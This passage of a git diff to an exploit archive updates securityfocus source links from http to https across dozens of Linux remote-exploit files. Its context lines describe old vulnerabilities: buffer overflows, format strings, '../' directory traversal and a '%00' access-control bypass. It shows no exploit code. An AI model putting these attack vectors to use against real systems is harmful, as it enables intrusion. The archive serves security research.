exploited by a remote attacker to execute arbitrary code. diff --git a/exploits/linux/remote/23740.c b/exploits/linux/remote/23740.c index 828cd510e..e9ea82d64 100644 --- a/exploits/linux/remote/23740.c +++ b/exploits/linux/remote/23740.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9715/info +source: https://www.securityfocus.com/bid/9715/info hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function. diff --git a/exploits/linux/remote/23771.pl b/exploits/linux/remote/23771.pl index c62d3116f..f812dcc96 100755 --- a/exploits/linux/remote/23771.pl +++ b/exploits/linux/remote/23771.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9772/info +source: https://www.securityfocus.com/bid/9772/info GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'. diff --git a/exploits/linux/remote/23772.c b/exploits/linux/remote/23772.c index e64c9daaf..e9b714f02 100644 --- a/exploits/linux/remote/23772.c +++ b/exploits/linux/remote/23772.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9772/info +// source: https://www.securityfocus.com/bid/9772/info GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'. diff --git a/exploits/linux/remote/23777.txt b/exploits/linux/remote/23777.txt index 5f578c958..c992576d4 100644 --- a/exploits/linux/remote/23777.txt +++ b/exploits/linux/remote/23777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9778/info +source: https://www.securityfocus.com/bid/9778/info It has been reported that Squid Proxy may be prone to an unauthorized access vulnerability that may allow remote users to bypass access controls resulting in unauthorized access to attacker-specified resources. The vulnerability presents itself when a URI that is designed to access a specific location with a supplied username, contains '%00' characters. This sequence may be placed as part of the username value prior to the @ symbol in the malicious URI. diff --git a/exploits/linux/remote/23794.txt b/exploits/linux/remote/23794.txt index 25e794a80..14cc2612b 100644 --- a/exploits/linux/remote/23794.txt +++ b/exploits/linux/remote/23794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9817/info +source: https://www.securityfocus.com/bid/9817/info It has been reported that PWebServer is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied URI requests. diff --git a/exploits/linux/remote/23801.txt b/exploits/linux/remote/23801.txt index 4ebe27288..2869bed88 100644 --- a/exploits/linux/remote/23801.txt +++ b/exploits/linux/remote/23801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9846/info +source: https://www.securityfocus.com/bid/9846/info It has been reported that GNU MyProxy may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/linux/remote/23802.txt b/exploits/linux/remote/23802.txt index 2fca89962..207e24a00 100644 --- a/exploits/linux/remote/23802.txt +++ b/exploits/linux/remote/23802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9847/info +source: https://www.securityfocus.com/bid/9847/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. A successful cross-site scripting attack may make it possible for an attacker to create a malicious link to a vulnerable site that includes hostile HTML and script code. This code may be rendered in the browser of a victim user who visits the malicious link and this will occur in the security context of the site hosting the software. The directory traversal vulnerability may allow a malicious user to request files outside of the web-server root directory with directory traversal strings such as '../'. diff --git a/exploits/linux/remote/23803.txt b/exploits/linux/remote/23803.txt index 5054f412d..e6a0a352f 100644 --- a/exploits/linux/remote/23803.txt +++ b/exploits/linux/remote/23803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9847/info +source: https://www.securityfocus.com/bid/9847/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. A successful cross-site scripting attack may make it possible for an attacker to create a malicious link to a vulnerable site that includes hostile HTML and script code. This code may be rendered in the browser of a victim user who visits the malicious link and this will occur in the security context of the site hosting the software. The directory traversal vulnerability may allow a malicious user to request files outside of the web-server root directory with directory traversal strings such as '../'. diff --git a/exploits/linux/remote/23811.c b/exploits/linux/remote/23811.c index 8f54945af..07b3e517c 100644 --- a/exploits/linux/remote/23811.c +++ b/exploits/linux/remote/23811.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9871/info +// source: https://www.securityfocus.com/bid/9871/info It has been reported that Mathopd is prone to a remote buffer overflow vulnerability. The issue arises due to a failure to check the bounds of a buffer storing user-supplied input. diff --git a/exploits/linux/remote/23848.txt b/exploits/linux/remote/23848.txt index cdaa7b929..f3e9c58e9 100644 --- a/exploits/linux/remote/23848.txt +++ b/exploits/linux/remote/23848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9919/info +source: https://www.securityfocus.com/bid/9919/info Reportedly SquidGuard is prone to a remote NULL URL character unauthorized access vulnerability. This issue is due to a failure of the application to properly filter out invalid URIs. diff --git a/exploits/linux/remote/23864.txt b/exploits/linux/remote/23864.txt index a24bef48c..909726608 100644 --- a/exploits/linux/remote/23864.txt +++ b/exploits/linux/remote/23864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9937/info +source: https://www.securityfocus.com/bid/9937/info XWeb is reportedly prone to directory traversal attacks. Remote attackers may exploit this issue to gain access to sensitive files outside of the server root. This would occur in the context of the server, i.e.: any files the server could access would also be accessible to the attacker. diff --git a/exploits/linux/remote/23881.txt b/exploits/linux/remote/23881.txt index 709a55018..6b322e114 100644 --- a/exploits/linux/remote/23881.txt +++ b/exploits/linux/remote/23881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9974/info +source: https://www.securityfocus.com/bid/9974/info Multiple locally and remotely exploitable buffer overrun and format strings were reported in emil. This could permit execution of arbitrary code in the context of the software. diff --git a/exploits/linux/remote/23936.pl b/exploits/linux/remote/23936.pl index b593ef030..5b0d5303c 100755 --- a/exploits/linux/remote/23936.pl +++ b/exploits/linux/remote/23936.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10085/info +source: https://www.securityfocus.com/bid/10085/info LCDproc Server (LCDd) has been reported to be prone to multiple remote vulnerabilities. diff --git a/exploits/linux/remote/24038.txt b/exploits/linux/remote/24038.txt index 0ef4e0273..85c389fcc 100644 --- a/exploits/linux/remote/24038.txt +++ b/exploits/linux/remote/24038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10193/info +source: https://www.securityfocus.com/bid/10193/info It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files. diff --git a/exploits/linux/remote/24079.c b/exploits/linux/remote/24079.c index ec3c046cc..cced1ef02 100644 --- a/exploits/linux/remote/24079.c +++ b/exploits/linux/remote/24079.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10267/info +// source: https://www.securityfocus.com/bid/10267/info APSIS Pound has been found to be prone to a remote format string vulnerability. The problem presents itself when Pound handles certain requests containing embedded format string specifiers. diff --git a/exploits/linux/remote/24093.c b/exploits/linux/remote/24093.c index e10d256d4..62230a50e 100644 --- a/exploits/linux/remote/24093.c +++ b/exploits/linux/remote/24093.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10290/info +// source: https://www.securityfocus.com/bid/10290/info Exim has been reported prone to a remotely exploitable stack-based buffer overrun vulnerability. diff --git a/exploits/linux/remote/24105.txt b/exploits/linux/remote/24105.txt index 419a5a47a..b97b35cf9 100644 --- a/exploits/linux/remote/24105.txt +++ b/exploits/linux/remote/24105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10315/info +source: https://www.securityfocus.com/bid/10315/info Squid proxy has been reported to be affected by an Internet access control bypass vulnerability. This issue is caused by a failure of the application to properly handle access controls when evaluating malformed URI requests. diff --git a/exploits/linux/remote/24106.txt b/exploits/linux/remote/24106.txt index 9f60e6bd1..0accf87b2 100644 --- a/exploits/linux/remote/24106.txt +++ b/exploits/linux/remote/24106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10316/info +source: https://www.securityfocus.com/bid/10316/info A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters. diff --git a/exploits/linux/remote/24120.pl b/exploits/linux/remote/24120.pl index 8cca8f6b3..3e332ac81 100755 --- a/exploits/linux/remote/24120.pl +++ b/exploits/linux/remote/24120.pl @@ -1,4 +1,4 @@ -//source: http://www.securityfocus.com/bid/10354/info +//source: https://www.securityfocus.com/bid/10354/info // //LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files. // diff --git a/exploits/linux/remote/24136.txt b/exploits/linux/remote/24136.txt index b4054b5f4..7c554777f 100644 --- a/exploits/linux/remote/24136.txt +++ b/exploits/linux/remote/24136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10383/info +source: https://www.securityfocus.com/bid/10383/info It is reported that KDE Konqueror is prone to a URI obfuscation weakness that may hide the true contents of a URI link. The issue occurs when an image is contained within a properly formatted HREF tag. diff --git a/exploits/linux/remote/24160.txt b/exploits/linux/remote/24160.txt index fd575195c..e8d5272ca 100644 --- a/exploits/linux/remote/24160.txt +++ b/exploits/linux/remote/24160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10439/info +source: https://www.securityfocus.com/bid/10439/info SquirrelMail is reported to be prone to an email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/linux/remote/24165.pl b/exploits/linux/remote/24165.pl index 23c3ed059..804606a59 100755 --- a/exploits/linux/remote/24165.pl +++ b/exploits/linux/remote/24165.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10446/info +source: https://www.securityfocus.com/bid/10446/info Firebird is reported prone to a remote buffer-overrun vulnerability. The issue occurs because the application fails to perform sufficient boundary checks when the database server is handling database names. diff --git a/exploits/linux/remote/24179.txt b/exploits/linux/remote/24179.txt index 000e34fed..60487ac96 100644 --- a/exploits/linux/remote/24179.txt +++ b/exploits/linux/remote/24179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10495/info +source: https://www.securityfocus.com/bid/10495/info Roundup is prone to a remote file disclosure vulnerability. A remote user can disclose files on a vulnerable computer by using the /home/@@file/ prefix and '../' directory traversal sequences. diff --git a/exploits/linux/remote/24221.pl b/exploits/linux/remote/24221.pl index ab08d29f5..7ce2df648 100755 --- a/exploits/linux/remote/24221.pl +++ b/exploits/linux/remote/24221.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10569/info +source: https://www.securityfocus.com/bid/10569/info It is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions. diff --git a/exploits/linux/remote/24223.py b/exploits/linux/remote/24223.py index 976d6d9a4..4218ee636 100755 --- a/exploits/linux/remote/24223.py +++ b/exploits/linux/remote/24223.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10578/info +source: https://www.securityfocus.com/bid/10578/info It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access. diff --git a/exploits/linux/remote/24259.c b/exploits/linux/remote/24259.c index 61d61b452..ceae9877e 100644 --- a/exploits/linux/remote/24259.c +++ b/exploits/linux/remote/24259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10672/info +// source: https://www.securityfocus.com/bid/10672/info Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a SNMP protocol dissector vulnerability. These issues are due to a failure of the application to properly handle malformed packets. diff --git a/exploits/linux/remote/24312.html b/exploits/linux/remote/24312.html index 9f574ef52..3ab12d36d 100644 --- a/exploits/linux/remote/24312.html +++ b/exploits/linux/remote/24312.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10796/info +source: https://www.securityfocus.com/bid/10796/info Mozilla and Firefox may permit malicious Web pages to spoof security properties of a trusted site. diff --git a/exploits/linux/remote/24338.c b/exploits/linux/remote/24338.c index d1751594a..eaeacab74 100644 --- a/exploits/linux/remote/24338.c +++ b/exploits/linux/remote/24338.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10833/info +// source: https://www.securityfocus.com/bid/10833/info A buffer overrun vulnerability is reported for Citadel/UX. The problem occurs due to insufficient bounds checking when processing 'USER' command arguments. diff --git a/exploits/linux/remote/24339.c b/exploits/linux/remote/24339.c index 75f2d0335..6f69e6f51 100644 --- a/exploits/linux/remote/24339.c +++ b/exploits/linux/remote/24339.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10833/info +// source: https://www.securityfocus.com/bid/10833/info A buffer overrun vulnerability is reported for Citadel/UX. The problem occurs due to insufficient bounds checking when processing 'USER' command arguments. diff --git a/exploits/linux/remote/24361.c b/exploits/linux/remote/24361.c index 8c60f92b3..3cb0d19c6 100644 --- a/exploits/linux/remote/24361.c +++ b/exploits/linux/remote/24361.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10899/info +// source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. diff --git a/exploits/linux/remote/24622.c b/exploits/linux/remote/24622.c index b11424e4a..64d98eab4 100644 --- a/exploits/linux/remote/24622.c +++ b/exploits/linux/remote/24622.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11233/info +source: https://www.securityfocus.com/bid/11233/info It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer. diff --git a/exploits/linux/remote/24669.txt b/exploits/linux/remote/24669.txt index 482355946..551d71bcd 100644 --- a/exploits/linux/remote/24669.txt +++ b/exploits/linux/remote/24669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11357/info +source: https://www.securityfocus.com/bid/11357/info MySQL is reported prone to multiple local vulnerabilities. Exploiting these issues may allow an attacker to bypass security restrictions or cause a denial-of-service condition in the application. diff --git a/exploits/linux/remote/24704.c b/exploits/linux/remote/24704.c index f24847845..98a2b8525 100644 --- a/exploits/linux/remote/24704.c +++ b/exploits/linux/remote/24704.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11526/info +// source: https://www.securityfocus.com/bid/11526/info The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer. diff --git a/exploits/linux/remote/24784.txt b/exploits/linux/remote/24784.txt index 34fb5c459..15435a970 100644 --- a/exploits/linux/remote/24784.txt +++ b/exploits/linux/remote/24784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11771/info +source: https://www.securityfocus.com/bid/11771/info The file command is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly validate string lengths in the affected file prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24794.sh b/exploits/linux/remote/24794.sh index e95ce8048..19bc6ec51 100755 --- a/exploits/linux/remote/24794.sh +++ b/exploits/linux/remote/24794.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11791/info +source: https://www.securityfocus.com/bid/11791/info scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24795.txt b/exploits/linux/remote/24795.txt index af43006b3..950e79d43 100644 --- a/exploits/linux/remote/24795.txt +++ b/exploits/linux/remote/24795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11792/info +source: https://www.securityfocus.com/bid/11792/info rssh is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24801.txt b/exploits/linux/remote/24801.txt index df08a0f89..ed59cdc31 100644 --- a/exploits/linux/remote/24801.txt +++ b/exploits/linux/remote/24801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11827/info +source: https://www.securityfocus.com/bid/11827/info KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers. diff --git a/exploits/linux/remote/24813.pl b/exploits/linux/remote/24813.pl index b032f4896..c6d3ddc96 100755 --- a/exploits/linux/remote/24813.pl +++ b/exploits/linux/remote/24813.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11871/info +source: https://www.securityfocus.com/bid/11871/info Multiple remote vulnerabilities reportedly affect GNU wget. These issues are due to the application's failure to properly sanitize user-supplied input and to properly validate the presence of files before writing to them. The issues include: diff --git a/exploits/linux/remote/24848.txt b/exploits/linux/remote/24848.txt index e2ef1a5e9..5a6a51663 100644 --- a/exploits/linux/remote/24848.txt +++ b/exploits/linux/remote/24848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11957/info +source: https://www.securityfocus.com/bid/11957/info ChBg is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain superuser privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24852.txt b/exploits/linux/remote/24852.txt index 71a6e6572..6f9b00bb9 100644 --- a/exploits/linux/remote/24852.txt +++ b/exploits/linux/remote/24852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11958/info +source: https://www.securityfocus.com/bid/11958/info A remote client-side buffer overflow vulnerability affects mpg123. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24853.c b/exploits/linux/remote/24853.c index fc1453b49..cb9212709 100644 --- a/exploits/linux/remote/24853.c +++ b/exploits/linux/remote/24853.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11962/info +// source: https://www.securityfocus.com/bid/11962/info A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24856.c b/exploits/linux/remote/24856.c index 7734afcd1..e21a1fe7b 100644 --- a/exploits/linux/remote/24856.c +++ b/exploits/linux/remote/24856.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11967/info +// source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed-size memory buffer. diff --git a/exploits/linux/remote/24857.c b/exploits/linux/remote/24857.c index 56b56b2db..b70a4ffc0 100644 --- a/exploits/linux/remote/24857.c +++ b/exploits/linux/remote/24857.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11967/info +// source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed-size memory buffer. diff --git a/exploits/linux/remote/24977.txt b/exploits/linux/remote/24977.txt index c137d6073..fd1a9aa53 100644 --- a/exploits/linux/remote/24977.txt +++ b/exploits/linux/remote/24977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11968/info +source: https://www.securityfocus.com/bid/11968/info CUPS is reported prone to a remote buffer overflow vulnerability. The issue is reported to exist in the 'hpgl-input.c' source file and is because of a lack of sufficient boundary checks performed on data contained in HPGL files. diff --git a/exploits/linux/remote/24978.txt b/exploits/linux/remote/24978.txt index 323ace31c..189c59fd8 100644 --- a/exploits/linux/remote/24978.txt +++ b/exploits/linux/remote/24978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11969/info +source: https://www.securityfocus.com/bid/11969/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file. diff --git a/exploits/linux/remote/25005.txt b/exploits/linux/remote/25005.txt index 59da9b572..96b927c0f 100644 --- a/exploits/linux/remote/25005.txt +++ b/exploits/linux/remote/25005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11991/info +source: https://www.securityfocus.com/bid/11991/info NASM is prone to a buffer overflow. This condition is exposed when the application attempts to assemble a source file that contains malformed '%error' preprocessor directive arguments. Since the source file may originate from an external or untrusted source, this vulnerability is considered remote in nature. diff --git a/exploits/linux/remote/25006.txt b/exploits/linux/remote/25006.txt index 08063363e..428085c13 100644 --- a/exploits/linux/remote/25006.txt +++ b/exploits/linux/remote/25006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11994/info +source: https://www.securityfocus.com/bid/11994/info It is reported that rtf2latex2e is susceptible to a stack buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied image data prior to copying it into a fixed-size memory buffer. diff --git a/exploits/linux/remote/25008.txt b/exploits/linux/remote/25008.txt index e1548d84d..0d6f30360 100644 --- a/exploits/linux/remote/25008.txt +++ b/exploits/linux/remote/25008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11997/info +source: https://www.securityfocus.com/bid/11997/info LinPopUp is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain unauthorized access to a computer in the context of the application. diff --git a/exploits/linux/remote/25010.txt b/exploits/linux/remote/25010.txt index 81fdc1dee..813ea2fcf 100644 --- a/exploits/linux/remote/25010.txt +++ b/exploits/linux/remote/25010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12000/info +source: https://www.securityfocus.com/bid/12000/info o3read is prone to a buffer overflow vulnerability. This issue is exposed when the program parses HTML content during file format conversion. This issue is considered to be remote in nature since it is possible that files may originate from an external or untrusted source. diff --git a/exploits/linux/remote/25015.txt b/exploits/linux/remote/25015.txt index 117d92ac4..6dfa9d44e 100644 --- a/exploits/linux/remote/25015.txt +++ b/exploits/linux/remote/25015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12010/info +source: https://www.securityfocus.com/bid/12010/info Ringtone Tools is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain unauthorized access to a computer in the context of the application. diff --git a/exploits/linux/remote/25030.txt b/exploits/linux/remote/25030.txt index b1670a708..4ac7c74bd 100644 --- a/exploits/linux/remote/25030.txt +++ b/exploits/linux/remote/25030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12030/info +source: https://www.securityfocus.com/bid/12030/info GNU UnRTF is prone to a buffer overflow vulnerability. This issue is exposed when the program converts RTF font table data. Since RTF documents may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25035.txt b/exploits/linux/remote/25035.txt index 5183e937a..35be1de20 100644 --- a/exploits/linux/remote/25035.txt +++ b/exploits/linux/remote/25035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12035/info +source: https://www.securityfocus.com/bid/12035/info PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the application handles a calendar file that contains excessively long lines. Since calendar files may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25036.txt b/exploits/linux/remote/25036.txt index 6fcfad2c4..a6f47fe72 100644 --- a/exploits/linux/remote/25036.txt +++ b/exploits/linux/remote/25036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12036/info +source: https://www.securityfocus.com/bid/12036/info PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the application handles a calendar file that contains excessively long holiday data. Since calendar files may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25054.txt b/exploits/linux/remote/25054.txt index 98c164d54..55fa6d51c 100644 --- a/exploits/linux/remote/25054.txt +++ b/exploits/linux/remote/25054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12312/info +source: https://www.securityfocus.com/bid/12312/info Konversation is a freely available IRC client for KDE windows environments on Linux platforms. diff --git a/exploits/linux/remote/25080.txt b/exploits/linux/remote/25080.txt index 0965e73d9..8c9fc0752 100644 --- a/exploits/linux/remote/25080.txt +++ b/exploits/linux/remote/25080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12428/info +source: https://www.securityfocus.com/bid/12428/info Newsgrab is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/linux/remote/25122.txt b/exploits/linux/remote/25122.txt index bc96c8fe2..20cc873fb 100644 --- a/exploits/linux/remote/25122.txt +++ b/exploits/linux/remote/25122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12586/info +source: https://www.securityfocus.com/bid/12586/info It is reported that various ZIP related plugins supplied with the server contain multiple directory traversal vulnerabilities. These issues may allow remote attackers to determine the existence of files on a computer and also disclose arbitrary files. The issues arise due to insufficient sanitization of user-supplied data. diff --git a/exploits/linux/remote/25150.txt b/exploits/linux/remote/25150.txt index b6a7a9527..5910b50d6 100644 --- a/exploits/linux/remote/25150.txt +++ b/exploits/linux/remote/25150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12628/info +source: https://www.securityfocus.com/bid/12628/info A remotely exploitable client-side directory-traversal vulnerability affects Winace unace. The application fails to properly sanitize file and directory names contained within malicious ACE format archives. diff --git a/exploits/linux/remote/25221.txt b/exploits/linux/remote/25221.txt index 4ce183262..900ec8c10 100644 --- a/exploits/linux/remote/25221.txt +++ b/exploits/linux/remote/25221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12798/info +source: https://www.securityfocus.com/bid/12798/info Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag. diff --git a/exploits/linux/remote/25275.c b/exploits/linux/remote/25275.c index a3507f885..0a8568ff0 100644 --- a/exploits/linux/remote/25275.c +++ b/exploits/linux/remote/25275.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12899/info +// source: https://www.securityfocus.com/bid/12899/info Smail-3 is reported prone to multiple vulnerabilities. These issues can allow a local or remote attacker to execute arbitrary code on a vulnerable computer. A successful attack may lead to a complete compromise. diff --git a/exploits/linux/remote/25321.c b/exploits/linux/remote/25321.c index 5305ea6f3..9fa75b6e6 100644 --- a/exploits/linux/remote/25321.c +++ b/exploits/linux/remote/25321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12947/info +// source: https://www.securityfocus.com/bid/12947/info mtftpd is reported prone to a remote format string vulnerability. diff --git a/exploits/linux/remote/25375.pl b/exploits/linux/remote/25375.pl index 9fc2d67d9..01e4f92f7 100755 --- a/exploits/linux/remote/25375.pl +++ b/exploits/linux/remote/25375.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13085/info +source: https://www.securityfocus.com/bid/13085/info A remote email message content spoofing vulnerability affects KDE KMail. This issue is due to a failure of the application to properly sanitize HTML email messages. diff --git a/exploits/linux/remote/25392.c b/exploits/linux/remote/25392.c index 4ac72e9b8..c5a55d3a2 100644 --- a/exploits/linux/remote/25392.c +++ b/exploits/linux/remote/25392.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13129/info +// source: https://www.securityfocus.com/bid/13129/info It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it. diff --git a/exploits/linux/remote/25526.c b/exploits/linux/remote/25526.c index 4e94305eb..300a1c310 100644 --- a/exploits/linux/remote/25526.c +++ b/exploits/linux/remote/25526.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13347/info +// source: https://www.securityfocus.com/bid/13347/info A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters. diff --git a/exploits/linux/remote/25547.pl b/exploits/linux/remote/25547.pl index 3236b2a3c..eebffd9da 100755 --- a/exploits/linux/remote/25547.pl +++ b/exploits/linux/remote/25547.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13401/info +source: https://www.securityfocus.com/bid/13401/info Convert-UUlib Perl module is prone to a remotely exploitable buffer-overflow vulnerability. diff --git a/exploits/linux/remote/25669.txt b/exploits/linux/remote/25669.txt index ee894b730..5fa817f14 100644 --- a/exploits/linux/remote/25669.txt +++ b/exploits/linux/remote/25669.txt @@ -1,4 +1,4 @@ -source: 